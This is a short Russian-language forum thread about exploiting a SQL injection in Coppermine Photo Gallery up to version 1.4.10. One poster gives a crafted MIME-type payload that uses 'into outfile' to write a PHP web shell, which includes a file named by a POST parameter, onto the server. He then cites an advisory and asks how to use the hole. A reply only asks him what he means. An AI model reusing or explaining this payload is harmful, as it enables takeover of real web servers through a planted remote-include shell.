Как это сделать.Типа код добавить в файл расширением изображения! :confused: :confused: :confused:
мутим картинку, с левым MIME type в Web сервере (lighttpd):

"image/jpg'/**/into/**/outfile/**/'/home/www/gallery/albums/edit/pic.php'/**/fields/**/terminated/**/by/**/''/**/optionally/**/enclosed/**/by/**/'<?if($_POST[nst]){include($_POST[nst]);}die;?>",

бред какой-то
>>>Типа код добавить в файл расширением изображения!
так ты хочешь внутрь файла запихать ? там mime не прописывается.
или ты хочешь послать на серв картинку c mime который ты описал?
вопрос: а что это юзает инъекцию в lighttpd ?

поясни чё ты конкретно хочешь сделать ?

Короче челы с NST нашли баг в Coppermine Photo Gallery vX.X.X<=1.4.10 - SQL Injection / Remote Shell http://nst.void.ru/?q=papers&cat_where=advisories&show=22
Я хочу узнать как это юзать.